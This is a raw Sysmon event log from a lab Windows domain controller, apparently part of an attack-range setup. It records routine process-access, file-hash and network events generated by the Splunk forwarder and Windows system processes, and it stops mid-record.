13:53:03.052{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E63F-6040-D44D-00000000AD01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200216Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.052{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200215Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.052{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200214Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.052{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200213Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.052{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200212Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.052{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E63F-6040-D44D-00000000AD01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200211Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.052{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E63F-6040-D44D-00000000AD01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200210Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.053{5ABCFE62-E63F-6040-D44D-00000000AD01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200209Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:03.005{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5D70B18C14EC8FC7FE5737EEE9B2734,SHA256=CFE0DDB713905AF31F0F666834E0318B0C0628136D43ECEA4B67636D5443B2D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200229Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:04.833{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1020FE55294B3EF7302662CC066F3879,SHA256=12666E4DBFC82E9E4C66526B63DE1830455EE4845A6CEF19DF2BAA71D03BD48B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200228Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:04.036{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C57AB89E5B5ED312BECA641170CEF45,SHA256=8A253E69245B0B29672ECD2E13A940626B85BF8F579D55EEF20FDDEE5FC20A4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200230Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:05.067{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFBD19E26D711332EAFFF954344AAAD3,SHA256=F302809805F14B9C96BB4C654AFB7522DE54FF59FB437C0912E5B4F65EC3E10E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200237Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:06.708{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200236Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:02.968{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55113-false10.0.1.12-8000- 23542300x80000000000000002200235Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:06.177{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1C7B82C219BA90F35AE91AE0180F676,SHA256=7233C12833FF094D040F1C8B634A627E5E691F4BB9ACC8CC303C509C974F9D31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200234Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:06.145{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8116571CE2ACA4B4A3A635E508480612,SHA256=2DAD7FA1C5975931FA8BDB9D33F2CF5C2532E46FDEFA991ACEB89729DC253122,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200233Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:06.036{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_rrvkgjhx.ygg.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200232Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:06.036{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_2uge4aow.wy3.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002200231Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:06.020{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_2uge4aow.wy3.ps12021-03-04 13:53:06.020 23542300x80000000000000002200240Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:07.911{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=449C029747174DF3F5B65B8FA97F40CA,SHA256=EA4E49573EA43F4414A39CF3B2BC904B410F3E9A9C4A7D50D7AFCFB43CB98ACB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200239Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:07.395{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1FA37D2ED64E61E023CC97190093FBF,SHA256=F8AD783D05860B4C9B25CCA607E12E0D20E3D40EBF8057D7DCA6271427165369,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200238Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:07.005{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9BA47E010A084C5AAF35449A97FB6FA2,SHA256=CA194591C55C9E3C17AD4A8BAEF7E70336B205620233D2CFFCF02BA9DFE485DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200275Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:04.530{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55114-false10.0.1.12-8089- 23542300x80000000000000002200274Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.677{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97F4956E72305EC0E40CA7EF09FCF114,SHA256=542917DEBF1D4D9CE0CE9F8971B195775E2B59A7927824252D909D9956DE5660,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200273Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200272Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200271Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200270Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200269Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200268Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200267Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200266Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200265Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200264Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200263Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200262Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200261Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:53:08.177{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200260Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 